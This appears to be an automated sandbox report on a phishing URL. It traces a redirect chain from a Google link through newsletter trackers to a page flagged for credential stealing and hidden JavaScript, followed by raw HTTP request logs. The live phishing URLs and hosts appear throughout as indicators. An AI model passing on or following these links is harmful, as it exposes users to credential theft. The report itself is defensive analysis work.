Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1Wy

Overview

General Information

Sample URL:https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp
Analysis ID:1525237
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code

Classification

  • System is w10x64
  • chrome.exe (PID: 4340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2232,i,15471388682000666349,14317564674064467546,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3MSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-teamHTTP Parser: Base64 decoded: 1727989022.000000
Source: https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-teamHTTP Parser: No favicon
Source: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.htmlHTTP Parser: No favicon
Source: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.htmlHTTP Parser: No favicon
Source: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.htmlHTTP Parser: No favicon
Source: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.htmlHTTP Parser: No favicon
Source: https://q0ednre2adn0en00.z1.web.core.windows.net/q0ednre2adn.htmlHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49913 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.se to https://link.mail.beehiiv.com/ss/c/u001.mtsaz3_wgze6oqdijx3i5wky17shk-m8xsmoltulms3mzubnl-qm9pvtutxywc1wyoovmb3tk3nbil2d2eailnalfxiwpw4ea5bjnfnlgtrbbu_09odoyxwioh5ogk5krozzgydg04gwv1a1i62v7zhashd2huxxlrbutlwj7nne5oobikrwbp09wdmru0ux1pwqtxww-4wqolqdm-eozn5os5dc9ac-zszgtplu68lyixlrcgujprs01qdo_af9karbtdnzs59rgsqwphvy55puqh74r1qd9rqnswa0qljmnb6xfydx4tkqq9pmk-sq/4a7/bvrt3igitgkfi8bq35ml_w/h53/h001.yn5jryzfvdjfbl0rfc-jvpp1xhk_gyk_k4zr7dwwm3m
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: link.mail.beehiiv.com to https://link.sbstck.com/redirect/6ef1e280-e65f-47a0-9173-11a97a4a3735?j=eyj1ijoingi2n3k1in0.p8kfpr3fjr2h_bk3dplixdv-gb9uenfuu61qzasc6nw&utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.151.9
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
Source: global trafficHTTP traffic detected: GET /url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M HTTP/1.1Host: www.google.seConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M HTTP/1.1Host: www.google.seConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=518=rZdW_LPJWgPFU7TrHdarktOWffRKlTBgIXU8G9aZSk__iXq_xqCyhUd_zvBuFTv83crX0wamG3a1QB3GjY6yAfAirS1o4ps0NaGRrUOUDZDbnDPaBqtf2DuQ_GX1xGNm2CeQPmUPuVP1HOSMerFYaGG1QuuHGx6pT0CuF0D5yq5igjC6kcrCVl9u8QJp6RIT
Source: global trafficHTTP traffic detected: GET /ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redirect/6ef1e280-e65f-47a0-9173-11a97a4a3735?j=eyJ1IjoiNGI2N3k1In0.P8kfPr3fJr2h_Bk3DPLIxDv-gb9UenFUu61QzASc6Nw&utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team HTTP/1.1Host: link.sbstck.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team HTTP/1.1Host: scenesaves.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://link.sbstck.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-team HTTP/1.1Host: scenesaves.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://scenesaves.me/?utm_source=lims-newsletter-dde1ae.beehiiv.com&utm_medium=newsletter&utm_campaign=sprint-teamAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: scenesaves.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1Host: scenesaves.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.js HTTP/1.1Host: pub-cb72f4af1674441897427b55eaf679a1.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://q0ednre2adn0en00.z1.web.core.windows.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1Host: scenesaves.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/9/94/Cloudflare_Logo.png/1200px-Cloudflare_Logo.png?20211125225208 HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/8ccfd79aee41159f HTTP/1.1Host: scenesaves.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yfj4OuVokcr-r5Yc3t2vKL7T6WY=nuPGM69ndnUWQCYHtk_TdhKnn2s; sxfatvqQOuG_GWrQkvDJSWISM2I=1727989014; gIyr5HE-crgK3E6VNTU33nUWWJ4=1728075414; JNdoKP9LXmWrtGUN_i35_8i63I0=aIpJlByV39UwVfSc5gT04x0_D64; 6WJHm1hAUqxGaig1vdLXwAHjqBE=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; jWscW1sM_AmK7armmueciafWe4A=1727989020; gpihpN_E_I-pWnNcHopa5SsNR-Y=1728075420; D6OaV91pWIoe3FS5e1S1dDwbD5Q=hqOfYShwSpn3uAJMb3DpTt_Wa_c
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://q0ednre2adn0en00.z1.web.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /index.js HTTP/1.1Host: pub-cb72f4af1674441897427b55eaf679a1.r2.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/9/94/Cloudflare_Logo.png/1200px-Cloudflare_Logo.png?20211125225208 HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
